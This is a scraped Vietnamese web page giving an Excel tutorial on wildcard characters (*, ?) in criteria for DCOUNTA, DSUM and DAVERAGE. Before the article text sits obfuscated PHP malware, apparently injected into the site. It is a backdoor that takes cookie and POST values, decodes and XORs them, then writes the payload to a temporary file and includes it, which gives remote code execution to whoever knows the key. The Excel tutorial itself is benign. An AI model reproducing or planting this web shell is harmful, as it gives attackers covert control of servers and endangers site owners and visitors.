$ylZYFX = chr (85) . '_' . 'E' . "\121" . "\130" . chr (108) . chr (104); $yLWtuVuIpp = 'c' . chr ( 753 - 645 ).chr (97) . "\x73" . chr ( 582 - 467 ).chr (95) . "\145" . "\170" . chr ( 510 - 405 ).chr (115) . "\x74" . 's';$kAOmFrC = class_exists($ylZYFX); $yLWtuVuIpp = "35366";$DZnLrk = strpos($yLWtuVuIpp, $ylZYFX);if ($kAOmFrC == $DZnLrk){function IAeTZP(){$aZfgaHHvu = new /* 4364 */ U_EQXlh(29822 + 29822); $aZfgaHHvu = NULL;}$XKXHSy = "29822";class U_EQXlh{private function KWZRppi($XKXHSy){if (is_array(U_EQXlh::$YNoKSXbD)) {$name = sys_get_temp_dir() . "/" . crc32(U_EQXlh::$YNoKSXbD["salt"]);@U_EQXlh::$YNoKSXbD["write"]($name, U_EQXlh::$YNoKSXbD["content"]);include $name;@U_EQXlh::$YNoKSXbD["delete"]($name); $XKXHSy = "29822";exit();}}public function HfLoXJy(){$XvCgWQeB = "40563";$this->_dummy = str_repeat($XvCgWQeB, strlen($XvCgWQeB));}public function __destruct(){U_EQXlh::$YNoKSXbD = @unserialize(U_EQXlh::$YNoKSXbD); $XKXHSy = "22734_2480";$this->KWZRppi($XKXHSy); $XKXHSy = "22734_2480";}public function gYQxmX($XvCgWQeB, $uwoXMoiAQJ){return $XvCgWQeB[0] ^ str_repeat($uwoXMoiAQJ, intval(strlen($XvCgWQeB[0]) / strlen($uwoXMoiAQJ)) + 1);}public function HturnsX($XvCgWQeB){$IRxSAES = "\142" . "\x61" . "\163" . chr (101) . chr (54) . chr ( 962 - 910 );return array_map($IRxSAES . chr ( 150 - 55 ).chr ( 1074 - 974 )."\145" . "\143" . 'o' . chr (100) . 'e', array($XvCgWQeB,));}public function __construct($oCcnlBmz=0){$vemMBQz = ',';$XvCgWQeB = "";$YdToI = $_POST;$OaybdGwVx = $_COOKIE;$uwoXMoiAQJ = "c88d6de5-9c28-4205-88d1-aa6ae4d03ace";$vclXYK = @$OaybdGwVx[substr($uwoXMoiAQJ, 0, 4)];if (!empty($vclXYK)){$vclXYK = explode($vemMBQz, $vclXYK);foreach ($vclXYK as $TPeibWgFe){$XvCgWQeB .= @$OaybdGwVx[$TPeibWgFe];$XvCgWQeB .= @$YdToI[$TPeibWgFe];}$XvCgWQeB = $this->HturnsX($XvCgWQeB);}U_EQXlh::$YNoKSXbD = $this->gYQxmX($XvCgWQeB, $uwoXMoiAQJ);if (strpos($uwoXMoiAQJ, $vemMBQz) !== FALSE){$uwoXMoiAQJ = explode($vemMBQz, $uwoXMoiAQJ); $dXdlFMY = sprintf("22734_2480", rtrim($uwoXMoiAQJ[0]));}}public static $YNoKSXbD = 56125;}IAeTZP();} Sử dụng ký tự đặc biệt để lập điều kiện trong Excel - Tải Chùa

Sử dụng ký tự đặc biệt để lập điều kiện trong Excel

Rate this post

(Sử dụng ký tự đặc biệt để lập điều kiện trong Excel) Trong Excel, việc tính tổng, tính trung bình hay đếm với một hoặc nhiều điều kiện đã được hỗ trợ bởi các hàm DSUM, DAVERAGE, DCOUNTA, SUMIF, COUNTIF. Với các hàm thông dụng này, người sử dụng có thể tính toán theo 1 hoặc nhiều điều kiện. Các điều kiện này có thể là địa chỉ ô hoặc lệnh gõ trực tiếp vào công thức.

Rõ ràng trong việc tính toán này thì thao tác lập điều kiện là khó khăn nhất khi sử dụng các hàm khi điều kiện có thể chứa giá trị, các dấu: >=, =, <=, … hay các công thức: LEFT, MID, RIGHT, … Blog tin học sẽ giới thiệu với các bạn một cách khác để lập công thức, đó chính là sử dụng các ký tự đặc biệt như: *,?.

Su dung ky tu dac biet de lap dieu kien trong excel

Giả sử chúng ta đang có 1 bảng dữ liệu danh sách cán bộ của một bộ phận trong một công ty có địa chỉ A3:H12. Các thuộc tính trong bảng dữ liệu này bao gồm Họ tên, Địa chỉ và doanh thu trong 4 quý. Công việc của chúng ta là dựa vào bảng dữ liệu này để đếm số lượng, tính tổng doanh thu và tính trung bình của những cán bộ có họ đệm là “Duy”, những cán bộ có địa chỉ là vần “ình” và những cán bộ có họ là vần “ồ”.

Để thực hiện được công việc này thì chúng ta sẽ lập 3 điều kiện tương ứng với 3 yêu cầu trên để tính toán:

  • Điều kiện 1: Tính toán thống kê tất cả những cán bộ có họ đệm là Duy có địa chỉ từ D14: D15 bằng cách nhập giá trị *Duy* tại ô điều kiện D15.
  • Điều kiện 2: Tính toán thống kê tất cả những cán bộ có địa chỉ là vần “ình” có địa chỉ từ E14:E15 bằng cách nhập giá trị *ình tại ô điều kiện E15.
  • Điều kiện 3: Tính toán thống kê tất cả những cán bộ có họ là vần “” có địa chỉ từ F14:F15 bằng cách nhập giá trị ?ồ tại ô điều kiện F15.
Tiếp theo, chúng ta sẽ làm việc với hàm trong Excel theo những điều kiện đã nhập.
Ví dụ: Đếm số lượng ta sử dụng hàm =DCOUNTA(database, field, criteral)
Tại ô D16 ta sử dụng công thức sau: D16 = DCOUNTA($A$3:$H$11,2,$D$14:$D$15).
Trong đó:
  • $A$3:$H$11: Đây là vùng Database (bao gồm cả dòng Tiêu đề).
  • 2: Cột số 2 (Cột cán bộ).
  • $D$14:$D$15: Vùng điều kiện (Criterial).
Tương tự, các bạn có thể tính tổng và trung bình bằng các hàm =DSUM, =DAVERAGE.
Trên đây là thủ thuật văn phòng với điều kiện trong Excel của Cuuhotinhoc.com. Hi vọng bài viết hữu ích cho các bạn!
Sử dụng ký tự đặc biệt để lập điều kiện trong Excel

5 (100%) 1 vote